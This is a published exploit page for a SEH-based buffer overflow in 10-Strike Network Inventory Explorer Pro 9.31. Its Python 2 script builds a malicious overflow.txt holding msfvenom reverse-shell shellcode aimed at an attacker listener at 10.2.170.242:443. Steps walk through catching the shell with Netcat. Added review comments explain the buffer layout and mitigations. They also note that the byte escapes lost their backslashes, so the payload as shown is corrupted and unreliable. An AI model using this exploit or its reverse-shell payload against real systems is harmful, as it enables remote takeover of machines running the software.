Authored by ro0k

10-Strike Network Inventory Explorer Pro version 9.31 suffers from a buffer overflow vulnerability.

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)
# Date: 2021-10-31
# Exploit Author: ro0k
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Version: 9.31
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928

# Proof of Concept:
# 1. Run python2 exploit.py to generate overflow.txt
# 2. Transfer overflow.txt to the Windows 10 machine
# 3. Set up a Netcat listener on the attacker machine
# 4. Open 10-Strike Network Inventory Explorer Pro
# 5. Select the Computers tab from the uppermost set of tabs
# 6. Select the From Text File option
# 7. Open overflow.txt
# 8. Receive the reverse shell connection on the attacker machine!

#!/usr/bin/env python
import struct

# NOTE(review): this script only builds a string in memory and writes it to
# one file, "overflow.txt", in the current directory; it performs no network
# activity itself.  Defensive context: the comment next to the `seh` line
# records that the module whose address is used (sqlite3.dll as shipped with
# the product) is listed with SafeSEH, ASLR and Rebase all absent — a module
# built with those mitigations enabled would presumably not expose a fixed,
# unprotected address of this kind.  On the endpoint side, the artifact is a
# single-line text file of roughly 0x17f bytes (no 0x0a/0x0d are ever
# written) imported through the product's "From Text File" dialog.
#
# NOTE(review): as rendered on this page the string literals in shellcode,
# nseh and subesp10 read as plain ASCII ("xd9xc8...") rather than the byte
# escapes the surrounding comments describe (the same loss is visible in the
# msfvenom -b list and in the DLL path quoted in the comments), so the file
# this copy writes is not byte-accurate to the original; treat any hash
# taken from it accordingly.

charslist = ""
# Byte values the author excluded; the msfvenom command in the comment
# further down lists the same six values with -b.
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]

# Builds the set of the remaining 250 byte values.  charslist is never
# referenced again after this loop, so it does not contribute to the buffer
# (presumably a leftover from the bad-character check).
for i in range (0x00, 0xFF+1):
    if i not in badchars:
        charslist += chr(i)

#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "x00x09x0ax0dx3ax5c"
# Payload as emitted by the msfvenom command above (see the rendering note at
# the top of the script about the missing escape prefixes).
shellcode = ("xd9xc8xd9x74x24xf4x58x33xc9xbbxc6xbcxd3x19xb1"
"x52x83xc0x04x31x58x13x03x9exafx31xecxe2x38x37"
"x0fx1axb9x58x99xffx88x58xfdx74xbax68x75xd8x37"
"x02xdbxc8xccx66xf4xffx65xccx22xcex76x7dx16x51"
"xf5x7cx4bxb1xc4x4ex9exb0x01xb2x53xe0xdaxb8xc6"
"x14x6exf4xdax9fx3cx18x5bx7cxf4x1bx4axd3x8ex45"
"x4cxd2x43xfexc5xccx80x3bx9fx67x72xb7x1exa1x4a"
"x38x8cx8cx62xcbxccxc9x45x34xbbx23xb6xc9xbcxf0"
"xc4x15x48xe2x6fxddxeaxcex8ex32x6cx85x9dxffxfa"
"xc1x81xfex2fx7axbdx8bxd1xacx37xcfxf5x68x13x8b"
"x94x29xf9x7axa8x29xa2x23x0cx22x4fx37x3dx69x18"
"xf4x0cx91xd8x92x07xe2xeax3dxbcx6cx47xb5x1ax6b"
"xa8xecxdbxe3x57x0fx1cx2ax9cx5bx4cx44x35xe4x07"
"x94xbax31x87xc4x14xeax68xb4xd4x5ax01xdexdax85"
"x31xe1x30xaexd8x18xd3xdbx1ex88xd1xb4x1cxccx14"
"xfexa8x2ax7cx10xfdxe5xe9x89xa4x7dx8bx56x73xf8"
"x8bxddx70xfdx42x16xfcxedx33xd6x4bx4fx95xe9x61"
"xe7x79x7bxeexf7xf4x60xb9xa0x51x56xb0x24x4cxc1"
"x6ax5ax8dx97x55xdex4ax64x5bxdfx1fxd0x7fxcfxd9"
"xd9x3bxbbxb5x8fx95x15x70x66x54xcfx2axd5x3ex87"
"xabx15x81xd1xb3x73x77x3dx05x2axcex42xaaxbaxc6"
"x3bxd6x5ax28x96x52x7axcbx32xafx13x52xd7x12x7e"
"x65x02x50x87xe6xa6x29x7cxf6xc3x2cx38xb0x38x5d"
"x51x55x3exf2x52x7c")

#pattern_offset.rb -l 250 -q 41316841
# Position in the input at which the nseh/seh values are placed, as
# reported by the pattern_offset run quoted above.
offset = 213

#nasm > jmp short 8
# Four characters for the first handler slot: the short jump from the
# comment above plus two 0x90 padding bytes.
nseh = "xebx06x90x90"
# Filler chosen so that junk + nseh is exactly `offset` characters long.
junk = "A" * (offset - len(nseh))

#0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:Program Files (x86)10-Strike Network Inventory Explorer Prosqlite3.dll)
# Handler address packed as a little-endian 32-bit value.  On Python 3
# struct.pack returns bytes, and the str + bytes concatenation below would
# raise TypeError — hence the "python2" requirement in the header.
seh = struct.pack("<I", 0x61e012f6)

#metasm > sub esp,0x10
# Stack adjustment placed immediately before the payload (see comment above).
subesp10="x83xecx10"
payload = shellcode

# Final layout: filler, the two handler slots, the stack adjustment, then
# the payload.  No newline is appended, so the output file is one line.
# (`buffer` also shadows the Python 2 builtin of the same name.)
buffer = junk + nseh + seh + subesp10 + payload

# Text-mode write without a context manager; mode "w" truncates any existing
# overflow.txt in the current directory.
f = open("overflow.txt", "w")
f.write(buffer)
f.close()